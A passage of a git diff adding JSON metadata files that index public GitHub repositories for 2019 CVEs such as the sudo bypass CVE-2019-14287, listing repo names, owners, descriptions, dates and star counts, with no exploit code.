"web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-14287", + "docker", + "dockerfile", + "openssh-server" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 258967892, + "name": "sudo-vulnerability-CVE-2019-14287", + "full_name": "axax002\/sudo-vulnerability-CVE-2019-14287", + "owner": { + "login": "axax002", + "id": 55937601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55937601?v=4", + "html_url": "https:\/\/github.com\/axax002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axax002\/sudo-vulnerability-CVE-2019-14287", + "description": "Sudo Vulnerability CVE-2019-14287", + "fork": false, + "created_at": "2020-04-26T07:29:44Z", + "updated_at": "2021-04-14T16:06:10Z", + "pushed_at": "2019-12-04T07:25:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263100309, + "name": "Exploit-CVE-2019-14287", + "full_name": "SachinthaDeSilva-cmd\/Exploit-CVE-2019-14287", + "owner": { + "login": "SachinthaDeSilva-cmd", + "id": 65182737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65182737?v=4", + "html_url": "https:\/\/github.com\/SachinthaDeSilva-cmd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SachinthaDeSilva-cmd\/Exploit-CVE-2019-14287", + "description": "Documentation for Sudo Security Bypass - CVE 2019-14287", + "fork": false, + "created_at": "2020-05-11T16:40:12Z", + "updated_at": "2020-05-11T16:43:41Z", + "pushed_at": "2020-05-11T16:43:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263135881, + "name": "CVE-2019-14287-IT18030372-", + "full_name": "HussyCool\/CVE-2019-14287-IT18030372-", + "owner": { + "login": "HussyCool", + "id": 39041533, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39041533?v=4", + "html_url": "https:\/\/github.com\/HussyCool", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HussyCool\/CVE-2019-14287-IT18030372-", + "description": "Sudo Security Policy bypass Vulnerability", + "fork": false, + "created_at": "2020-05-11T19:19:17Z", + "updated_at": "2020-05-12T16:26:53Z", + "pushed_at": "2020-05-12T16:26:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263302751, + "name": "sudo-Security-Bypass-vulnerability-CVE-2019-14287", + "full_name": "ShianTrish\/sudo-Security-Bypass-vulnerability-CVE-2019-14287", + "owner": { + "login": "ShianTrish", + "id": 61201267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61201267?v=4", + "html_url": "https:\/\/github.com\/ShianTrish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShianTrish\/sudo-Security-Bypass-vulnerability-CVE-2019-14287", + "description": null, + "fork": false, + "created_at": "2020-05-12T10:16:49Z", + "updated_at": "2020-05-12T10:23:07Z", + "pushed_at": "2020-05-12T10:23:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263365252, + "name": "Sudo-Security-Bypass-Vulnerability", + "full_name": "ejlevin99\/Sudo-Security-Bypass-Vulnerability", + "owner": { + "login": "ejlevin99", + "id": 61104825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61104825?v=4", + "html_url": "https:\/\/github.com\/ejlevin99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ejlevin99\/Sudo-Security-Bypass-Vulnerability", + "description": "This is a brief exploitation of CVE-2019-14287 Sudo Security Bypass Vulnerability. ", + "fork": false, + "created_at": "2020-05-12T14:45:54Z", + "updated_at": "2020-05-12T14:52:34Z", + "pushed_at": "2020-05-12T14:52:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263369235, + "name": "Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-", + "full_name": "thinuri99\/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-", + "owner": { + "login": "thinuri99", + "id": 65239508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65239508?v=4", + "html_url": "https:\/\/github.com\/thinuri99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinuri99\/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-", + "description": "This is the exploitation of sudo security bypass vulnerability", + "fork": false, + "created_at": "2020-05-12T15:00:57Z", + "updated_at": "2020-05-12T15:01:34Z", + "pushed_at": "2020-05-12T15:01:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263397296, + "name": "-CVE-2019-14287-SUDO-bypass-vulnerability", + "full_name": "janod313\/-CVE-2019-14287-SUDO-bypass-vulnerability", + "owner": { + "login": "janod313", + "id": 61660520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61660520?v=4", + "html_url": "https:\/\/github.com\/janod313", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/janod313\/-CVE-2019-14287-SUDO-bypass-vulnerability", + "description": null, + "fork": false, + "created_at": "2020-05-12T16:53:23Z", + "updated_at": "2020-05-12T17:07:20Z", + "pushed_at": "2020-05-12T17:07:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263398100, + "name": "CVE-2019-14287", + "full_name": "DewmiApsara\/CVE-2019-14287", + "owner": { + "login": "DewmiApsara", + "id": 61881246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61881246?v=4", + "html_url": "https:\/\/github.com\/DewmiApsara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DewmiApsara\/CVE-2019-14287", + "description": null, + "fork": false, + "created_at": "2020-05-12T16:56:59Z", + "updated_at": "2020-05-12T16:58:31Z", + "pushed_at": "2020-05-12T16:58:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 296529902, + "name": "Sudo-CVE-2019-14287", + "full_name": "M108Falcon\/Sudo-CVE-2019-14287", + "owner": { + "login": "M108Falcon", + "id": 56510580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56510580?v=4", + "html_url": "https:\/\/github.com\/M108Falcon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M108Falcon\/Sudo-CVE-2019-14287", + "description": "Scripts to verify and execute CVE-2019-14287 as part of Research", + "fork": false, + "created_at": "2020-09-18T06:10:35Z", + "updated_at": "2020-10-04T11:18:47Z", + "pushed_at": "2020-10-04T11:18:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 361513143, + "name": "CVE-2019-14287-", + "full_name": "edsonjt81\/CVE-2019-14287-", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2019-14287-", + "description": null, + "fork": false, + "created_at": "2021-04-25T18:57:10Z", + "updated_at": "2021-06-13T13:24:17Z", + "pushed_at": "2021-04-25T18:57:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 369226666, + "name": "Linux-Privilege-Escalation-using-Sudo-Rights", + "full_name": "DularaAnushka\/Linux-Privilege-Escalation-using-Sudo-Rights", + "owner": { + "login": "DularaAnushka", + "id": 69114421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69114421?v=4", + "html_url": "https:\/\/github.com\/DularaAnushka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DularaAnushka\/Linux-Privilege-Escalation-using-Sudo-Rights", + "description": "CVE-2019-14287", + "fork": false, + "created_at": "2021-05-20T13:57:38Z", + "updated_at": "2021-05-20T13:58:32Z", + "pushed_at": "2021-05-20T13:58:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 377824354, + "name": "CVE-2019-14287", + "full_name": "n3rdh4x0r\/CVE-2019-14287", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2019-14287", + "description": null, + "fork": false, + "created_at": "2021-06-17T12:33:08Z", + "updated_at": "2024-11-18T19:01:28Z", + "pushed_at": "2024-11-18T19:01:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 416654145, + "name": "Sudo-Vulnerability-Exploit-CVE-2019-14287", + "full_name": "Hasintha-98\/Sudo-Vulnerability-Exploit-CVE-2019-14287", + "owner": { + "login": "Hasintha-98", + "id": 62957436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62957436?v=4", + "html_url": "https:\/\/github.com\/Hasintha-98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hasintha-98\/Sudo-Vulnerability-Exploit-CVE-2019-14287", + "description": null, + "fork": false, + "created_at": "2021-10-13T08:35:57Z", + "updated_at": "2021-10-13T08:37:42Z", + "pushed_at": "2021-10-13T08:36:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploitation", + "vulnerability", + "vulnerability-detection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 550531926, + "name": "CVE-2019-14287", + "full_name": "MariliaMeira\/CVE-2019-14287", + "owner": { + "login": "MariliaMeira", + "id": 111706139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111706139?v=4", + "html_url": "https:\/\/github.com\/MariliaMeira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MariliaMeira\/CVE-2019-14287", + "description": null, + "fork": false, + "created_at": "2022-10-12T23:33:05Z", + "updated_at": "2022-10-15T02:40:29Z", + "pushed_at": "2022-10-12T23:37:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 687504769, + "name": "CVE-2019-14287", + "full_name": "Ijinleife\/CVE-2019-14287", + "owner": { + "login": "Ijinleife", + "id": 134709627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134709627?v=4", + "html_url": "https:\/\/github.com\/Ijinleife", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ijinleife\/CVE-2019-14287", + "description": null, + "fork": false, + "created_at": "2023-09-05T13:46:33Z", + "updated_at": "2023-09-05T13:46:34Z", + "pushed_at": "2023-09-05T13:46:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871942214, + "name": "poc-cve-2019-14287", + "full_name": "lemonadern\/poc-cve-2019-14287", + "owner": { + "login": "lemonadern", + "id": 62321668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62321668?v=4", + "html_url": "https:\/\/github.com\/lemonadern", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lemonadern\/poc-cve-2019-14287", + "description": null, + "fork": false, + "created_at": "2024-10-13T11:33:23Z", + "updated_at": "2024-10-25T17:22:16Z", + "pushed_at": "2024-10-25T17:22:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-14287", + "sudo", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14314.json b/2019/CVE-2019-14314.json new file mode 100644 index 0000000000..61b64b6972 --- /dev/null +++ b/2019/CVE-2019-14314.json @@ -0,0 +1,33 @@ +[ + { + "id": 237402303, + "name": "CVE-2019-14314", + "full_name": "imthoe\/CVE-2019-14314", + "owner": { + "login": "imthoe", + "id": 31655061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31655061?v=4", + "html_url": "https:\/\/github.com\/imthoe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imthoe\/CVE-2019-14314", + "description": "CVE-2019-14314 - NextGEN Gallery 3.2.10 Authenticated SQL Injection", + "fork": false, + "created_at": "2020-01-31T09:54:06Z", + "updated_at": "2024-08-12T19:57:13Z", + "pushed_at": "2020-01-31T10:51:53Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14319.json b/2019/CVE-2019-14319.json new file mode 100644 index 0000000000..28c4f05f03 --- /dev/null +++ b/2019/CVE-2019-14319.json @@ -0,0 +1,33 @@ +[ + { + "id": 206061423, + "name": "CVE-2019-14319", + "full_name": "MelroyB\/CVE-2019-14319", + "owner": { + "login": "MelroyB", + "id": 39052594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39052594?v=4", + "html_url": "https:\/\/github.com\/MelroyB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MelroyB\/CVE-2019-14319", + "description": null, + "fork": false, + "created_at": "2019-09-03T11:29:51Z", + "updated_at": "2024-08-12T19:52:37Z", + "pushed_at": "2019-09-03T11:30:26Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14322.json b/2019/CVE-2019-14322.json new file mode 100644 index 0000000000..82c6010b1e --- /dev/null +++ b/2019/CVE-2019-14322.json @@ -0,0 +1,103 @@ +[ + { + "id": 367884859, + "name": "CVE-2019-14322-scanner", + "full_name": "faisalfs10x\/CVE-2019-14322-scanner", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/CVE-2019-14322-scanner", + "description": "PoC of CVE-2019-14322: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", + "fork": false, + "created_at": "2021-05-16T13:15:12Z", + "updated_at": "2021-07-04T10:00:55Z", + "pushed_at": "2021-07-04T10:00:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 368100083, + "name": "http-vuln-cve2019-14322.nse", + "full_name": "faisalfs10x\/http-vuln-cve2019-14322.nse", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/http-vuln-cve2019-14322.nse", + "description": "Nmap NSE script to detect CVE-2019-14322 of Pallets Werkzeug path traversal via SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames", + "fork": false, + "created_at": "2021-05-17T07:48:19Z", + "updated_at": "2021-07-04T10:02:55Z", + "pushed_at": "2021-07-04T10:02:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 859728354, + "name": "CVE-2019-14322", + "full_name": "sergiovks\/CVE-2019-14322", + "owner": { + "login": "sergiovks", + "id": 118485549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118485549?v=4", + "html_url": "https:\/\/github.com\/sergiovks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sergiovks\/CVE-2019-14322", + "description": "Modification of: PoC of CVE-2019-14322: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", + "fork": false, + "created_at": "2024-09-19T07:17:01Z", + "updated_at": "2024-09-20T07:47:27Z", + "pushed_at": "2024-09-20T07:47:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-14322", + "exploit", + "lfi", + "local-file-inclusion", + "odoo", + "pallets-werkzeug", + "werkzeug-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14326.json b/2019/CVE-2019-14326.json new file mode 100644 index 0000000000..593a129275 --- /dev/null +++ b/2019/CVE-2019-14326.json @@ -0,0 +1,41 @@ +[ + { + "id": 249678751, + "name": "cve-2019-14326", + "full_name": "seqred-s-a\/cve-2019-14326", + "owner": { + "login": "seqred-s-a", + "id": 49437606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49437606?v=4", + "html_url": "https:\/\/github.com\/seqred-s-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seqred-s-a\/cve-2019-14326", + "description": "Privilege escalation in Andy emulator", + "fork": false, + "created_at": "2020-03-24T10:31:23Z", + "updated_at": "2024-08-12T19:59:11Z", + "pushed_at": "2020-04-14T08:24:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "android-emulator", + "andy", + "cve", + "cve-2019-14325", + "exploit", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14339.json b/2019/CVE-2019-14339.json new file mode 100644 index 0000000000..ad7a91f5e9 --- /dev/null +++ b/2019/CVE-2019-14339.json @@ -0,0 +1,33 @@ +[ + { + "id": 198801002, + "name": "CVE-2019-14339", + "full_name": "0x48piraj\/CVE-2019-14339", + "owner": { + "login": "0x48piraj", + "id": 5800726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5800726?v=4", + "html_url": "https:\/\/github.com\/0x48piraj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x48piraj\/CVE-2019-14339", + "description": "POC for CVE-2019-14339 Canon PRINT 2.5.5", + "fork": false, + "created_at": "2019-07-25T09:30:02Z", + "updated_at": "2024-08-12T19:51:22Z", + "pushed_at": "2019-09-15T16:45:19Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 14, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14439.json b/2019/CVE-2019-14439.json new file mode 100644 index 0000000000..d8d04cc630 --- /dev/null +++ b/2019/CVE-2019-14439.json @@ -0,0 +1,33 @@ +[ + { + "id": 199983488, + "name": "CVE-2019-14439", + "full_name": "jas502n\/CVE-2019-14439", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-14439", + "description": "Jackson-databind RCE", + "fork": false, + "created_at": "2019-08-01T05:33:06Z", + "updated_at": "2024-08-12T19:51:34Z", + "pushed_at": "2019-08-01T05:33:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14450.json b/2019/CVE-2019-14450.json new file mode 100644 index 0000000000..ba91e87c2a --- /dev/null +++ b/2019/CVE-2019-14450.json @@ -0,0 +1,33 @@ +[ + { + "id": 318244452, + "name": "CVE-2019-14450", + "full_name": "securifera\/CVE-2019-14450", + "owner": { + "login": "securifera", + "id": 12126525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12126525?v=4", + "html_url": "https:\/\/github.com\/securifera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securifera\/CVE-2019-14450", + "description": null, + "fork": false, + "created_at": "2020-12-03T15:54:39Z", + "updated_at": "2021-12-13T21:33:11Z", + "pushed_at": "2020-12-03T15:55:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14514.json b/2019/CVE-2019-14514.json new file mode 100644 index 0000000000..6f8ab5fc93 --- /dev/null +++ b/2019/CVE-2019-14514.json @@ -0,0 +1,40 @@ +[ + { + "id": 238645564, + "name": "cve-2019-14514", + "full_name": "seqred-s-a\/cve-2019-14514", + "owner": { + "login": "seqred-s-a", + "id": 49437606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49437606?v=4", + "html_url": "https:\/\/github.com\/seqred-s-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seqred-s-a\/cve-2019-14514", + "description": "Remote code execution in Microvirt MEmu", + "fork": false, + "created_at": "2020-02-06T08:54:45Z", + "updated_at": "2024-08-12T19:57:25Z", + "pushed_at": "2020-02-06T09:07:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "android-emulator", + "cve", + "cve-2019-14514", + "exploit", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14529.json b/2019/CVE-2019-14529.json new file mode 100644 index 0000000000..072907e0ce --- /dev/null +++ b/2019/CVE-2019-14529.json @@ -0,0 +1,33 @@ +[ + { + "id": 202034341, + "name": "CVE-2019-14529", + "full_name": "Wezery\/CVE-2019-14529", + "owner": { + "login": "Wezery", + "id": 53606486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53606486?v=4", + "html_url": "https:\/\/github.com\/Wezery", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wezery\/CVE-2019-14529", + "description": "OpenEMR Security issue", + "fork": false, + "created_at": "2019-08-13T01:01:51Z", + "updated_at": "2024-08-12T19:51:56Z", + "pushed_at": "2019-10-14T10:21:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14530.json b/2019/CVE-2019-14530.json new file mode 100644 index 0000000000..f8e1a093d3 --- /dev/null +++ b/2019/CVE-2019-14530.json @@ -0,0 +1,73 @@ +[ + { + "id": 202038918, + "name": "CVE-2019-14530", + "full_name": "Wezery\/CVE-2019-14530", + "owner": { + "login": "Wezery", + "id": 53606486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53606486?v=4", + "html_url": "https:\/\/github.com\/Wezery", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wezery\/CVE-2019-14530", + "description": "OpenEMR security issue", + "fork": false, + "created_at": "2019-08-13T01:33:11Z", + "updated_at": "2024-08-12T19:51:56Z", + "pushed_at": "2019-08-14T01:32:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 381637999, + "name": "exploit-CVE-2019-14530", + "full_name": "sec-it\/exploit-CVE-2019-14530", + "owner": { + "login": "sec-it", + "id": 78081535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78081535?v=4", + "html_url": "https:\/\/github.com\/sec-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sec-it\/exploit-CVE-2019-14530", + "description": "OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure", + "fork": false, + "created_at": "2021-06-30T08:59:57Z", + "updated_at": "2024-06-06T00:43:14Z", + "pushed_at": "2021-07-08T19:35:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-14530", + "exploit", + "local-file-disclosure", + "openemr", + "openemr-exploit", + "openemr-vulnerability", + "path-traversal", + "poc" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14537.json b/2019/CVE-2019-14537.json new file mode 100644 index 0000000000..8552256590 --- /dev/null +++ b/2019/CVE-2019-14537.json @@ -0,0 +1,33 @@ +[ + { + "id": 201036325, + "name": "CVE-2019-14537", + "full_name": "Wocanilo\/CVE-2019-14537", + "owner": { + "login": "Wocanilo", + "id": 25706428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25706428?v=4", + "html_url": "https:\/\/github.com\/Wocanilo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wocanilo\/CVE-2019-14537", + "description": "CVE-2019-14537 PoC", + "fork": false, + "created_at": "2019-08-07T11:25:39Z", + "updated_at": "2024-08-12T19:51:45Z", + "pushed_at": "2019-08-08T08:04:22Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-14540.json b/2019/CVE-2019-14540.json new file mode 100644 index 0000000000..185243749b --- /dev/null +++ b/2019/CVE-2019-14540.json @@ -0,0 +1,33 @@ +[ + { + "id": 203497733, + "name": "cve-2019-14540-exploit", + "full_name": "LeadroyaL\/cve-2019-14540-exploit", + "owner": { + "login": "LeadroyaL", + "id": 9478918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478918?v=4", + "html_url": "https:\/\/github.com\/LeadroyaL", + "user_view_type": "public" + }, + 